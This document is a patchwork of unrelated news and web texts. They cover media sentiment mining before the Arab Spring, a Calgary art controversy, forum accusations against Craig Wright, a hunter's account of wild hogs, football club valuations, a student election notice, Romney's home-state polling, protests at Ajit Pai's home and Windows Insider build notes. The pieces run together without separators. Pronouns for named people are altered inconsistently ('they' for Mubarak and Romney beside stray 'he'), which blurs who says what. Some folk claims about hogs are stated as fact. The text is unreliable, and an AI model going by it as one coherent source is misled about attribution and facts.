Figure 6, from Us
Advertisement
Figure 7, from Star
Figure 8, from Star
Image caption Sentiment mining showed a sharp change in tone around Egypt ahead of President Mubarak's ousting
Feeding a supercomputer with news stories could help predict major world events, according to US research.
A study, based on millions of articles, charted deteriorating national sentiment ahead of the recent revolutions in Libya and Egypt.
While the analysis was carried out retrospectively, scientists say the same processes could be used to anticipate upcoming conflict.
The system also picked up early clues about Osama Bin Laden's location.
Kalev Leetaru, from the University of Illinois' Institute for Computing in the Humanities, Arts and Social Science, presented their findings in the journal First Monday.
Mood and location
The study's information was taken from a range of sources including the US government-run Open Source Centre and BBC Monitoring, both of which monitor local media output around the world.
News outlets which published online versions were also analysed, as was the New York Times' archive, going back to 1945.
In total, Mr Leetaru gathered more than 100 million articles.
Reports were analysed for two main types of information: mood - whether the article represented good news or bad news, and location - where events were happening and the location of other participants in the story.
Image caption The Nautilus SGI supercomputer crunched the 100 million articles
Mood detection, or "automated sentiment mining" searched for words such as "terrible", "horrific" or "nice".
Location, or "geocoding" took mentions of specific places, such as "Cairo" and converted them in to coordinates that could be plotted on a map.
Analysis of story elements was used to create an interconnected web of 100 trillion relationships.
Predicting trouble
Data was fed into an SGI Altix supercomputer, known as Nautilus, based at the University of Tennessee.
The machine's 1024 Intel Nehalem cores have a total processing power of 8.2 teraflops (trillion floating point operations per second).
Based on specific queries, Nautilus generated graphs for different countries which experienced the "Arab Spring".
In each case, the aggregated results of thousands of news stories showed a notable dip in sentiment ahead of time - both inside the country, and as reported from outside.
Image caption Media "sentiment" around Egypt fell dramatically in early 2011, just before the resignation of President Mubarak.
For Egypt, the tone of media coverage in the month before President Hosni Mubarak's resignation had fallen to a low only seen twice before in the preceding 30 years.
Previous dips coincided with the 1991 US aerial bombardment of Iraqi troops in Kuwait and the 2003 US invasion of Iraq.
Mr Leetaru said that their system appeared to generate better intelligence than the US government was working with at the time.
If you look at this tonal curve it would tell you the world is darkening so fast and so strongly against them that it doesn't seem possible they could survive. Kalev Leetaru, University of Illinois
"The mere fact that the US President stood in support of Mubarak suggests very strongly that that even the highest level analysis suggested that Mubarak was going to stay there," they told BBC News.
"That is likely because you have these area experts who have been studying Egypt for 30 years, and in 30 years nothing has happened to Mubarak.
The Egypt graph, said Mr Leetaru, suggested that something unprecedented was happening this time.
"If you look at this tonal curve it would tell you the world is darkening so fast and so strongly against them that it doesn't seem possible they could survive."
Similar drops were seen ahead of the revolution in Libya and the Balkans conflicts of the 1990s.
Saudi Arabia, which has thus far resisted a popular uprising, had experienced fluctuations, but not to the same extent as some other states where leaders were eventually overthrown.
Mapping Bin Laden
In their report, Mr Leetaru suggests that analysis of global media reports about Osama Bin Laden would have yielded important clues about their location.
Image caption Media reports mentioning Osama Bin Laden may have helped narrow down their location
While many believed the al-Qaeda leader to be hiding in Afghanistan, geographic information extracted from media reports consistently identified them with Northern Pakistan.
Only one report mentioned the town of Abbottabad prior to Bin Laden's discovery by US forces in April 2011.
However, the geo-analysis narrowed them down to within 200km, said Mr Leetaru.
Real time analysis
The computer event analysis model appears to give forewarning of major events, based on deteriorating sentiment.
However, in the case of this study, its analysis is applied to things that have already happened.
According to Kalev Leetaru, such a system could easily be adapted to work in real time, giving an element of foresight.
"That's the next stage," said Mr Leetaru, who is already working on developing the technology.
"It looks like a stock ticker in many regards and you know what direction it has been heading the last few minutes and you want to know where it is heading in the next few.
"It is very similar to what economic forecasting algorithms do."
Mr Leetaru said they also hoped to improve the resolution of analysis, especially in relation to geographic location.
"The next iteration is going to city level and beyond and looking at individual groups and how they interact.
"I liken it to weather forecasting. It's never perfect, but we do better than random guessing."
Calgary's mayor has finally weighed in on the Bowfort Towers controversy, calling the uproar over the art project a “public lynch mob.”
A week after the unveiling of the contentious artwork, Mayor Naheed Nenshi said they are going to reserve judgment of the piece until they have seen it in person and it is finished. Still to be installed across from the towers are drumlines — oval-shaped mounds of earth left behind by receding glaciers.
“I think it's a bit dangerous to make judgments on something that's not done, that you haven't seen or experienced,” Nenshi said during a news conference at the provincial legislature unveiling the city charter.
The artwork, a quartet of steel beams cradling rocks, is supposed to be representative of Blackfoot culture because of the use of the number four, which represents the four seasons, four stages of life.
However, many in the Blackfoot community are concerned and angry about the towers looking too similar to traditional burial structures. Many have said if there had been proper consultation, there would have been a red flag raised on the similarities.
Nenshi is adamant that the seven-person panel that decided on the artwork and city administration followed the art policy that was in place “to a T,” and that it bothers them they are facing a “sort of public lynch mob.”
“They worked very hard, they looked at different proposals and this is what they felt made sense for that location.”
They insisted there was proper consultation with the Blackfoot people, saying a “traditional knowledge keeper whose expertise is in the field of Blackfoot archeology and symbolism” had been consulted on the project.
Adrian Stimson, a Blackfoot artist who applied for the project when the call for proposals went out but was disqualified when their application didn't make it to the right office on time, explained what a traditional knowledge keeper is.
“(It is) someone who has either grown up in and around their culture, who takes part in the social life of the First Nation or community, who understands various Indigenous protocols (and) they may be called upon to do ceremony,” said Stimson.
Related
Stimson said they question what kind of consultation took place, saying since the announcement of the artwork, he's had several Blackfoot elders and members approach them on how they all see burial platforms and are expressing disappointment with the city.
“Saying they had consultation is a cop out. They need to be very clear on what type of consultation and with whom. The person who they consulted may have missed the similarities altogether,” said Stimson.
“This is why there needs to be a more comprehensive process, you can't expect one person to know everything or be responsible.”
ajunker@postmedia.com
On Twitter: @JunkerAnna
Rebocbew wrote: Isn't publishing software somewhat anonymously actually pretty simple? There was that dude Beal Screamer who broke Microsoft's DRM in media player a number of years ago, and to my knowledge no one ever found out who did that either. Even without sites like Github around specifically for the purpose of sharing code it doesn't seem to me like it'd be all that difficult, and when someone does find out who Satoshi is I don't think it'll be a reporter at Wired.
Rebocbew wrote: Hey, look! It's a guy with an apparent interest in security who seems to value their privacy and doesn't want to be in the spotlight. Yeah, that hardly ever happens.
Wired wrote: The first evidence pointing to Wright appeared in mid-November, when an anonymous source close to Wright began leaking documents to Gwern Branwen, a pseudonymous, independent security researcher and dark web analysis
Wired wrote: There's also a PDF authored by Kleiman, who died in April of 2013, in which they agree to take control of a trust fund, codenamed the “Tulip Trust,” containing 1.1 million bitcoins. The PDF is signed with Kleiman's PGP signature, a cryptographic technique that ensures it couldn't have been altered post-signature.
Wired wrote: McGrathNicol: a liquidation report on one of several companies Wright founded known as Hotwire, an attempt to create a bitcoin-based bank. It shows that the startup was backed in June 2013 by $23 million in bitcoins owned by Wright.
report wrote: The Directors have advised that $30 million was subscribed to by the shareholders in paid up capital and
this was injected via Bitcoins
report wrote: Given the Company's main activity was research and development of (uncommercialised) software, it was
reliant on the ongoing support of its shareholders and research development credits (“R&D credits”) from
the ATO to meet its day to day trading costs.
report wrote: Further to incurring a range of expenses, the Company lodged its GST return for the September 2013
quarter, claiming a GST refund of $3.1 million (“the GST refund”)
report wrote: After various discussions and
correspondence, the ATO issued a notice to the Company on 20 January 2014 notifying that it intended to
withhold the refund pending further verification of transactions and the treatment of Bitcoin.
report wrote: Following continued efforts to secure the GST refund and attempts to raise funding from other sources
(which were ultimately unsuccessful), the Directors resolved that the Company was insolvent and
appointed Administrators on 28 April 2014.
Wired wrote: At the time of the company's incorporation, Wright's investment in that one firm alone represented more than 1.5 percent of all existing bitcoins, a strangely large stash for an unknown player in the bitcoin world.
Pastebin was practically invented for small scale leaks like that.Uhh, "apparent interest in security"? You mean an outright criminal? Someone who likely orchestrated this whole "Nakamoto" thing to begin with?Wired isn't in the wrong because they exposed someone who wanted to remain private. They're wrong because they "exposed" someone who wanted the exact opposite.Look at the wired article:This "source" is probably Wright. Heck, are we sure "Gwern" isn't Wright too?In other words, there is no proof that such a trove exists. There's no proof that Kleiman signed it either, because Kleiman is dead and thus their "close friend and confident" could have signed it using Kleiman's credentials. The time is also completely meaningless, you need to establish an external synchronicity.Uh, no. It shows that Wright claimed such a thing and then pretty clearly shows it didn't exist:They advised that they did this. In other words, they simply said they did. McGrathNicol never independently verified any of it. They didn't purport to either, that's not what they do. I actually already suspected that one of the persons in the incorporation was a fraudulent personage; a sock-puppet for Wright.Why? They wanted government money:He also wants VAT refunds for transactions that never occurred.The government says, uh, like no?He obviously couldn't, and the company folds:Like, you don't even really have to read between the lines. It's leaking off the page.And what does Wire say?Their credulity is killing me.If you read that McGrathNicol report you realize that this "company" never had a dime (Cash at bank? LITERALLY ZERO section 10.1), and the only transactions it ever concluded were on paper and with other wright entities.This is textbook fraud, of the "idiotic fraud for dummies" variety.This guy isn't a victim, he's a CRIMINAL who has, astoundingly and with the flimsiest amount of effort, bamboozled "tech journalists".
Description of Wild Hogs
There are actually five different types of wild hogs; the original Piney Woods Rooter, the Russian, the hybrids between these two, the Chinese feral hogs, and hybrids between all four. All the varieties of hogs mentioned interbreed quite easily with the Russian traits appearing dominant and appear to be the most numerous in the feral hog population. The hogs carrying a lot of piney woods rooter characteristics would stand, fight and end up in the smokehouse. The hogs with a lot of Russian characteristics would run. Thus the ones doing most of the procreating carry Russian characteristics. Also when people introduce hogs into an area they usually choose the Russian type boars.
One way to group the different varieties would be by the number of chromosomes. The pure Piney Woods Rooter, Russian, and their hybrids have thirty-six chromosomes, the Chinese type feral hogs have thirty-eight chromosomes and the Russian/Piney Woods Rooter/Chinese hybrids have the possibility of thirty-six, thirty-seven, or thirty-eight chromosomes.
In general, a feral hog's head is massive with smaller, pointed and heavily furred ears. Wild hogs have a mane that grows along the spine composed of split guard hairs called bristles that can be five inches in length and run from the head along the center line of the back, and can be raised two to four inches up from the body when the hog is excited or agitated. What really keeps the wild hogs warm in winter though is the thick woolen under coat.
The coat coloration is a wide selection of colors and types depending on the genetic background. It can vary from solid black, brown, dark gray, tan, red, white, or a combination of any two or more colors in patterns of belted, mottled, pointed or spotted. A belted hog is usually a solid dark color and has a white band around the hog's torso near the shoulder area.
Normally the Russian type are heavier in the shoulders and slope down to the small hips, giving the wild hog an outline similar to an American bison.
A feral hog will usually take up to five years to gain their full adult size in the wild. Most hogs taken are in the 150 to 250 pound size. Most wild hogs are long legged (3 ½ to 5 feet long & 2 to 3 feet tall) and run like deer.
Wild boars have very long and thin snouts. I've heard one old hunter describe a wild hog's snout as "being suitable for extracting bugs from the bottom of a discarded beer bottle". The snout is used for digging up soil so it can eat bugs, roots, and plant bulbs growing in the under story growth of the beech and swamp trees. The rooting action of the hog causes the most direct damage to the forest or a farmer's field. Hogs destroy many bulbs, rare flowers, and threatened animals like the Indigo snake or birds like the red-cocked woodpecker. A hog can root down below three feet in softer soils. The round nose at the end of a healthy hog's snout is cold, wet, and covered in pig snot. In fall, hogs don't root as much probably because of the abundance of mast from oaks, beech and hickory trees. But during the winter and very early spring, a hog is very busy filling their stomach by rooting. A hog only has one stomach and cannot chew their cud. Thus, like a human it cannot digest cellulose material like brown, dry leaves but must have tender sprouts, roots, bulbs, worms, grubs, and anything with a dense nutrition value.
Feral hogs have forty-four teeth, which includes a group of four continuously growing canine teeth called tusks. The upper tusks or whitters curls up and out and constantly rubs against the lower tusks putting a knifelike edge to the lower tusks. An adult male can have tusks up to five inches in length with an impressive curl before they are broken or worn from use. The largest on record is eight inches. Females have slightly smaller tusks but are just as deadly. Both sexes use their tusks for defense and in addition the males use theirs to establish dominance during breeding. The adult males normally use their large tusks to stab in an upward or sideways movement but the females and young males are more likely to slice or bite. Sometimes when you've got a big old boar bayed up you can hear them popping their tusks for miles away. This intimidates some dogs but by the time you take your dogs into the woods you should already have culled a dog that would be scared by that noise. Whatever sex, when a wild hog, over two hundred pounds of intense rage comes charging at you, mouth wide open, it's extremely "stimulating". It is also the best time to get an accurate estimate of the hog's age. Just take a really good look at their molars. LOL.
An old time saying is a rooter is finished growing when you can pick them up by the ears, the head and the body are equal in size. If the head tips down you have to let ‘em grow a little more. Present day myths estimate a hog's age according to how big they are, or by how big the tusks are, neither is correct. The hogs genetics and nutrition plays the most significant role is the rate of their growth. Like horses and cows the age of a wild hog are best guestimated by the number and wear of the molars.
Under the skin on the front part of the body is a layer of cartilage and scar tissue, called a shield. It continually develops like a callus as the hog ages and from fighting. It can be one to two inches thick and protects their ribs and shoulder from the tusks of other boars during fights for territory or the favors of the female hogs. It has even been known to stop small caliber bullets.
The last physical part that's different from a tame pig is the tail. A wild hog's tail is usually straight and tufted at the tip. A domestic pig or a wild hog with Chinese genes has a curly tail. A pure wild boar runs with their tail in an upright manner similar to the way African wart hog's tail is carried when they trot while a feral and hybrid hogs will vary in how they carry their tail.
Remember though this is a general description and when blended with domestic feral stock, any combination of color, size, or shape is possible.
Wild boars do not like the company of other boars at all. In fact they're so solitary by nature that a group of two or more adult males is called a singularity of boars. In the early days, settlers used to neuter some of the males at a young age so the sounders would have the protection of a male hog from predators like bears, panthers, and wolves. It also removed the rank taste of an intact male from the meat
A group of hogs traveling together, called a sounder, is usually the sows and their offspring. A feral sow will normally have two to six piglets in a litter twice a year at any time. Of course this depends on the amount of available food and the genetic background of the sow. A well-fed sow that has recently escaped or has retained most of the domestic genes will have large litters. Gestation is normally one hundred and fifteen days. Wild piglets, called watermelons, weigh almost two pounds at birth, are light brown in color, and have six brown stripes and five black stripes the length of their body (marked like a chipmunk) until the age of four months. Sows raise their piglets communally allowing any piglet to nurse if they have milk available. This practice of one sow watching and feeding three or four sows' litters while the others are out feeding has probably caused many inexperienced hunters and "bunny huggers" to think hogs have bigger litters than they really do. At three to four months, the piglets are no longer dependent on their mother for nourishment but stay in the sounder until they reach puberty, which for the females can be six to seven months and for the males, nine months. Adolescent males form into small groups of their own but when mature will lead a solitary life except when joining the sounder during rut.
Piglets usually have a high mortality rate due more to food resources and weather than predation. Sows are very aggressive in defense of their young and if one pig squeals, they'll all come running to help. Hogs have several adaptations that help them to survive in the wild. One is that during times when the mast is really scarce, reproduction, which depends on the amount of food consumed, ceases. But if there is an abundance of food, wild hogs have larger litters.
The area a hog covers on a daily basis is greatly influenced by the amount of food available at that time and season. With abundant food, water and no disturbances, feral hogs appear to follow a daily routine. The first action a hog will normally take after waking up is head for water to fill up. A wild hog will repeat this action at midday and before retiring for the night.
Hogs can easily adapt to almost any environment because they are omnivorous, meaning they can and will eat anything that is or was alive. A hog can eat grass and other plant food but they are also opportunistic hunters. If a hog comes across a baby animal like a fawn, rabbits, etc. they will take advantage of the opportunity to increase their protein intake. In a normal day a hog can cover from five to fifty miles in the search for adequate food.
If a wild hog has a weakness it is their inability to regulate their temperature by sweating. But as long as they have a reliable source of water they can wallow in the mud to cool off. After coating themselves liberally with mud they start rubbing it off on trees, posts, rocks, whatever is handy. This is supposed to help them rid their hide of surplus fleas, lice, and ticks. This is one of the signs a hog hunter looks for when scouting for hog in an area. From looking at the mud rubs on different objects an experienced hog hunter can give you quite an educated and accurate guess of the hog's size and how long ago the hog rubbed mud on the object.
During late spring and summer, hogs will graze on farmer's fields. The types of field crops damaged by hogs include, corn, grass, hay, milo, peanuts, rice, rye, soybeans, turf, vegetables, wheat and other grains.
The damage by hogs is not limited to just what they eat, it also includes the collateral damage from pulling plants out of the ground exposing the roots, rooting around looking for any bugs below the ground level, devastating a field and causing mudholes to be developed in the fields which allows misquotes to breed and multiply. Normally the heaviest damage occurs towards the end of the growing season just before the field is ready for harvesting. Like rats and other vermin, a hog will waste nine times as much as they actually eat. Eating high quality food like this does wonders for the quality of hog meat but really ruins a farmer's benevolent disposition towards wild critters in general.
A hog's sense of smell is phenomenal, rivaling any other wild animal living in the woods. They were used in France instead of dogs to smell out truffles, a special type of mushroom that grows underground sometimes three feet down. A long time ago in England, sportsmen had bred a special type of hog for bird retrieving called a slut. They were known to be so friendly towards their owner, that anyone being overly affectionate was also called a slut.
Hogs are the hardest game to catch. An adult wild hog is the smartest animal in the woods, even smarter than some people. They're wary of any strange noise and their hearing is extremely good. Their field of vision is poor since their head is located so close to the ground and they can't raise it as high as some other animals. This decreases their ability to see over brush or briars but since a hog will usually head for thick underbrush or dense forest when frightened, this is hardly a hindrance. Their shield is really useful when going through some of the jungles we have around here composed of sawtooth palmetto, green briar, etc. We have two kinds of vines we call "wait-a-minute vine". When you're moving in the brush and they catch you at neck level, you call out to the guy following you to "wait a minute". The small thorned variety will get in you skin and is almost impossible to dig out until it festers while the big thorned variety have thorns that are about a half inch to one inch long and will rip your skin like a wood saw. It is highly recommended that you wear a heavy denim jacket and canvas material pants to keep your skin from being torn up.
The vegetation grows so close and tight a dog going in doesn't have much room to maneuver, especially in the Titi thickets. For that reason we like the two-dog team. More than two and they get in each other's way and will get cut up. It takes a good dog with a lot of grit to go into one of those tangles. It takes a great dog to go in, stop the hog and come out with only a few scratches. This is one of the places that training pays off. We prefer a dog to tease a hog into chasing them out into the open where there's more space to work on him. Some of those old rooters become extremely canny after being hunted a while and refuse to come out. Then we have to go in after him. Your adrenaline gets very high crawling into those tunnels that make up a hog bed. The brush is so thick two feet above the ground you can't stand up. Sometimes there's water instead of ground and in addition to hogs you have to watch out for ‘gators. In a situation like this you have to have dogs you can trust to do their job because if a hog breaks loose from the dog there's no jumping out of their way.
No matter whether a hog comes from a long line of Rooters, Russians, Chinese, or is an admixture of any or all of them, when they are served on a table to family and friends, they all taste good.
(Back to Top)
(Return to Articles page)
Real Madrid the most valuable team in football ahead of Barcelona
Cristiano Ronaldo's Real Madrid are world's most valuable football team
Real Madrid have retained their place as the most valuable football team, despite a drop in figures, according to Forbes magazine.
The reigning European champions have seen their value drop by five per cent, but they are still worth £2.13bn and their £489m in revenue is the highest of any sports team in the world.
Spanish rivals Barcelona are second in the 2015 list with a value of £2.07bn followed by the Premier League's most valuable team, Manchester United at £2.03bn.
Louis van Gaal's men are one of eight Premier Leagues sides in the top 20, with Manchester City, Chelsea, Arsenal and Liverpool all placing in the top eight.
Tottenham (13th), Newcastle (18th) and West Ham (19th) also make the top 20, which is rounded out by Turkish side Galatasaray.
Forbes' top 10 most valuable teams of 2015:
1 Real Madrid £2.13bn
2 Barcelona £2.07bn
3 Manchester United £2.03bn
4 Bayern Munich £1.54bn
5 Manchester City £905m
6 Chelsea £898m
7 Arsenal £859m
8 Liverpool £644m
9 Juventus £549m
10 AC Milan £508m
All students at UBC, past and present, play some part in shaping the university as we know it today. Perhaps you like it the way it is, or you think it could be better? Either way, the world keeps changing so ongoing adjustments need to be made to the way things run at UBC. And, the elected student leaders are the ones making sure these changes champion student voices on matters ranging from student housing to climate change to the affordability and accessibility of your education.
I doubt we need to tell you that choosing these student leaders wisely is important. The voting period will run from March 11 – March 15, 2019, and you will have the opportunity to vote for one student for each elected position. We encourage you to dive in and find out what elected positions you will be voting students into, so you are familiar with the responsibilities each entail. This will help you make an informed decision on which candidate you think is the best fit when voting polls open in a few weeks' time.
Head to the Candidates page to find out which of your peers is hoping to win your vote!
Mitt Romney's current standing in the polls in Massachusetts gives them the dubious honor of being more unpopular in their home state than any presidential candidate in modern history.
A look back at 50 years of elections in the US shows that if they win on November 6 Romney would become the first president of modern times to be elected despite losing the popular vote in their home state.
Romney, who was governor of Massachusetts just six years ago, now trails Obama by over 17 points in recent polls there.
Voting trends going back to 1960, when John F Kennedy – who like Romney had a background in Massachusetts politics – show that the winner of the presidential election has always won the state where they served in political office.
The story is largely the same with the losing presidential candidates. Only two in the Guardian's sample of 13 elections have failed to win their states – Al Gore in 2000 and George McGovern in 1972.
But Romney's projected performance in Massachusetts, if accurate, will still stand out from those two candidates. Polls conducted in October show Romney behind Obama by 17.4 points in the state, much worse than either Gore or McGovern fared in their home states.
Gore, who served as a Democratic member of congress and later senator for Tennessee before serving as Bill Clinton's vice-president, lost the popular vote in their state, by 51.15% to 47.28% – 3.87 points. They lost the election to George W Bush as well, despite famously winning the popular vote.
George McGovern, a Democratic senator from South Dakota, lost the popular vote in their state to Richard Nixon by 54.15% to 45.52%, or 8.63 points. They lost the presidential election too, in a massive landslide.
The thing the three have in common is that their home states, at the time of their elections, trend towards the opposite party, but even so Romney would hope to be closer in the state where they have spent their entire adult life and where they were governor until 2007.
Romney grew up in Michigan before studying at Stanford university in California for a year. They then spent two years in France as a Mormon missionary before returning to study at Brigham Young University in Utah. The future Republican nominee moved to Massachusetts in 1971 to attend Harvard, and after graduating in 1975 moved into consultancy in Boston, where they spent the majority of their career.
Romney spent five years as a bishop within the Mormon church in Massachusetts in the 1980s, and ran for senate in the state in 1994. They were elected Massachusetts governor in 2002 and served for a single term before resigning to run for president in 2008.
Looking west to Michigan, where Romney spent their formative years and where their father George was a popular three-term governor, it still looks negative. The most recent Rasmussen poll in Michigan shows Obama with support from 52% of likely voters, while 45% plan to vote for Romney.
On the cheerier side, Romney does have a chance of winning New Hampshire, where they have a summer home, and will almost certainly triumph in their undergraduate home of Utah.
The leftist group Popular Resistance showed up outside Federal Communication Commission (FCC) Chairman Ajit Pai's house Sunday to protest their policy on net neutrality, and they plan to be there again on Mother's Day.
“Our purpose for going to Pai's house is to educate people in their community and throughout the country of their plans to undermine internet freedom,” Kevin Zeese, co-director of the group Popular Resistance, told The Daily Caller News Foundation Wednesday. Activists visited Pai's neighborhood in Arlington, Va. There they placed door hangars with a picture of the chairperson's face on homes throughout the community, including Pai's.
Zeese claimed that Pai's house was not the priority.
“That was not our intention to go to Pai's house, but their house was near a cul-de-sac, and there was an opening to their house. We saw their house — it was fifty feet away — and so we put one on their door,” Zeese told TheDCNF.
Zeese continued to insist that the plan wasn't to visit Pai's home, despite the fact that the organizing Facebook Page for the event was “Knock Knock! It's Net Neutrality.”
The group plans to return to Pai's home on Mother's Day where they will stage a two hour protest from 4 p.m. to 6 p.m.
“Join us this Sunday evening for a vigil on the public sidewalk outside of Chairman Pai's home,” a Facebook event invite reads. The group then plans to return to Pai's house everyday until the May 18th FCC Open Meeting.
Zeese said they don't feel bad about protesting outside the chairperson's house in front of their wife and young children on Mother's Day.
“You haven't been to their house,” they told TheDCNF. “His house is way off the road, and so I don't think they'll be affected by it. We're going to be out there holding signs to get our message across about protecting the internet. We will not be blocking driveways. We will not be harassing anybody. We'll just be holding signs on a public sidewalk.”
When pressed on the matter, Zeese continued to insist that the protest was not meant to coincide with Mother's Day.
“It was not a factor in our decision. The key factor is that the FCC is holding its next public meeting May 18. Hallmark holidays are not my priority,” they quipped.
“He's a public official and the public, including their neighbors, have a right to know that they are working to undermine the internet by playing favorites to their former employer Verizon and other telecoms,” they added.
Zeese went on to explain that their movement's protest isn't against one particular party. In the summer of 2014, Popular Resistance protested outside of former FCC Chairman Tom Wheeler's Georgetown home.
“We did this to Democrats, too. We did this to Tom Wheeler. We went further and blocked their driveway,” Zeese said, providing a photograph of the event.
Wheeler came out and talked to the group of protesters who refused to let them pull out of their driveway with their car.
“He ended up taking a common carrier to work,” Zeese joked, using an FCC term to describe the Washington D.C. metro system.
Zeese, who served as Ralph Nader's 2004 presidential campaign press secretary and spokesperson, was thrown out of a 2014 FCC public meeting after they and fellow activist Margaret Flowers attempted to unfurl a large banner in the middle of the event.
“The vicious attacks on Ajit Pai, both obscene, threatening and racist suggest the left has run out of ideas if not vitriol,” Grover Norquist, president of Americans for Tax Reform (ATR), a taxpayer advocacy group, told TheDCNF. “Ajit Pai deserves the support and admiration of every free marketer in the United States. They have stood strong for expanding free and open markets for all Americans and against rent seeking and monopoly power.”
The Alliance for Global Justice serves as the fiscal agent for Popular Resistance, according to Zeese. They said that the upcoming protests outside of Pai's house will be funded out of their own budget and that the group doesn't receive funding from traditional Democratic Party sources or other big donors.
“I'd love for Facebook to fund us. I'd love for Google to fund us. But they do not fund us or the movement,” Zeese asserted. “At least they're taking the right position, and I respect that.”
Zeese initially told TheDCNF that Popular Resistance's largest donor was the Byewood Foundation. TheDCNF was unable to locate a website or contact information for the Byewood Foundation, and pressed Zeese further. They said Thursday that they had made a mistake.
“I made a major error,” Zeese said in an email to TheDCNF. “I gave an old name for our funder. The current name is Brightwater Fund.” Zeese confirmed that the Connecticut-based Brightwater Fund, a non profit that focuses on private grant-making foundations programs, is Popular Resistance's largest donor.
While Facebook declined to comment on specifics, a spokesperson told TheDCNF that “we support strong net neutrality rules and will continue to fight for rules that protect the open internet.”
Google did not respond to requests for comment.
Popular Resistance was created out of the Occupy Washington D.C. protests of 2011. Zeese denounced racist comments and death threats levied against Pai on the FCC's website and emphasized that it was not acceptable political discourse.
Editor's Note: This story has been updated to reflect new information regarding Popular Resistance's funding.
Follow Ted on Twitter
Send Tips to ted@dailycallernewsfoundation.org.
Content created by The Daily Caller News Foundation is available without charge to any eligible news publisher that can provide a large audience. For licensing opportunities of our original content, please contact licensing@dailycallernewsfoundation.org.
Announcing Windows 10 Insider Preview Build 14366 & Mobile Build 14364 By Dona Sarkar / Software Engineer, Windows and Devices Group Share Share Skype
UPDATE 6/17: We have released Windows 10 Insider Preview Build 14366 for PC to Windows Insiders in the Slow ring.
Hello Windows Insiders!
WOW, what a week. You all were on fire last week with the all of the feedback for the double dose of PC + Mobile. I also appreciated you sharing your career/business goals with me this weekend. This is why we build Windows—to enable those goals to happen. Thank you!
Today, we are releasing Windows 10 Insider Preview Build 14366 for PC and Windows 10 Mobile Insider Preview Build 14364 to Windows Insiders in the Fast ring! We're in the process of getting the Mobile build pushed out – I'll update this blog post once we confirm it is live. As of 6:00pm Pacific Time – Build 14364 for Mobile is now available.
The team is now laser focused on getting ready to ship the Windows 10 Anniversary Update to customers this summer. This means you won't see significant new features in builds for a little while. But these builds will include a bunch of really good and important fixes and general performance improvements that we need Windows Insiders to check out and give us feedback on. This update will go out to the 300+ million active devices already running Windows 10 today and beyond. Windows Insiders are critical to helping make that the Windows 10 Anniversary Update awesome for our customers.
Now for the exciting stuff: with today's new builds for PC and Mobile, we are officially kicking off the Windows 10 Anniversary Update June Bug Bash. The bug bash has been an integral part of Windows culture as long as I can remember and one of my favorite weeks of the cycle. I have compiled a long list of techniques we have used to get out of our daily usage patterns which I'll share with you throughout the week. This has always been an epic time of bonding for our team as we focus on one singular goal: to flush out those bugs that might have evaded us before this baby goes out into the world. We will be kicking off the bug bash internally today as well so know we're all in it together!
Over the course of the next 4 days, we will also be publishing multiple Quests inside Feedback Hub that will highlight different areas of the product each day. We will be looking for feedback on each Quest, but you can also just use all the Windows 10 features and apps you are most passionate about. The goal is just to work together now through Sunday to get the best bug reports possible! We are cycling the Quests over the week but will be bringing them all back over the weekend for more feedback.
Just like with the last Bug Bash, the Quests that you will see are not traditional Quests that list steps of trying a feature or scenario out. Many of them are open ended intentionally so that you can perform the steps that come naturally to you in order to finish the Quest and give us feedback on it. Many of them also list more than one scenario that can be tried out to finish the Quest. Many of the Quests for the Bug Bash will lead back to Feedback Hub so that you can upvote existing feedback or give new feedback based on your experience of completing the Quest. For some, you will be directed back to the traditional 5-point rating question.
Just like last time, the Quest will be marked as with:
LIMITED TIME Quests: Quests marked as “LIMITED TIME” will expire within 24hrs of being published so make sure you get to these before the time runs out and they're replaced with new Quests.
ADVANCED Quests: Quests marked as “ADVANCED” are more technical and may require changing the system configuration on your device and require an understanding on how to revert the changes after the Quest is done. You should only perform Quests that you feel comfortable doing, if something goes wrong you'll need to be able to troubleshoot how to get back to a good state on your PC.
After you get this new build installed, open up Feedback Hub and get started. We're REALLY excited about being able to include you for the first time on something that is part of our internal engineering culture at Microsoft. As I've been talking to our engineering team all week, I keep seeing big smiles and lots of excitement as people talk about how awesome it is to include Insiders as part of our team activities because you *are* a part of our team. We're shipping this product together and I again stress how valuable your feedback is.
We hope you have fun with this, and send us some great bug reports. For more information on this week's Bug Bash – see this post in Feedback Hub on more details. For those who participated in last Bug Bash in April – thank you. Badges in Feedback Hub will be coming out soon to recognition your help!
Some new things
Office Online for Microsoft Edge: Use Word, Excel, PowerPoint, OneNote and Sway Online without needing Office installed. The Office Online extension is the quickest way to view, edit, create Office files in Microsoft Edge! You can also quickly access your recent files, thanks to integration with OneDrive and OneDrive for Business. Visit our extensions page at the Microsoft Edge Dev website to learn more and try it out for yourself!
Windows Store Update: A Store update (Version 11606.1000.43.0) is rolling out today that includes some good performance improvements to prevent the Store from crashing and using up too many resources on your devices. You should see an overall improvement navigating the Store and visiting app pages.
Improvements and fixes for PC (Build 14366)
For you mes amis: If you have a French Windows 10 Insider Preview build installed on your PC, you should receive this build as we have fixed the issue with the French translation process that caused a lot of text to revert from French back to English.
Navigating to the Privacy pages in Settings app will no longer crash the Settings app and prevent you from adjusting your privacy settings.
We have fixed the issue causing PC and Mobile devices trying to project to a PC (via the new PC Access feature) to fail.
We fixed the issue where Start would not launch while an app is installing for certain languages, such as Chinese or Portuguese (Brazil).
We've updated the size of the Windows Ink Workspace icon in the notification area on the taskbar to be more consistent with the other notification area icons. In a similar drive to improve the consistency of our experience, we've updated the X to leave the Windows Ink Workspace which will now show a red state when you hover over it. We also fixed an issue where mouse wheel scrolling wouldn't work to spin the ruler with certain mice, and an issue where dismissing the share pane or accepting the prompt to enter tablet mode would result in exiting the Windows Ink Workspace.
We have updated Cortana search results, so now when you right-click on a .docx file, you'll see a context menu option to open that file's location.
We fixed an issue resulting in the monitors in under Settings > System > Display from sometimes jumping to a different ordering after being clicked and causing scaling changes. We also fixed an issue where the slider to change display scaling might jump to an unexpected scale factor as you were moving it.
We fixed an issue resulting in not being able to unsnap a full screen Remote Desktop window if you had been prompted credentials while connecting.
We fixed an issue when the tile names could become cut off after using semantic zoom, and one where Start tiles could no longer be moved with touch.
In an effort to improve visibility and access to your newly installed apps, we have moved the “Recently added” section of Start to be located above the “Most used” section in the apps list. We've also increased the duration of time in which apps will be listed here – now 7 days, so you can easily try them out and decide if you want to pin them to Start or the taskbar for regular use and quick access.
We fixed an issue where an active VPN connection could block the PC from going from idle into sleep.
We fixed an issue where the touch keyboard might appear on the Lock screen after pressing the Num-Lock key on the keyboard.
We fixed an issue that could result in Microsoft Edge using a large amount of CPU when open to a page with many animated gifs, as well as an issue resulting in certain captchas not displaying correctly.
From this build on your default location will now be preserved across build updates.
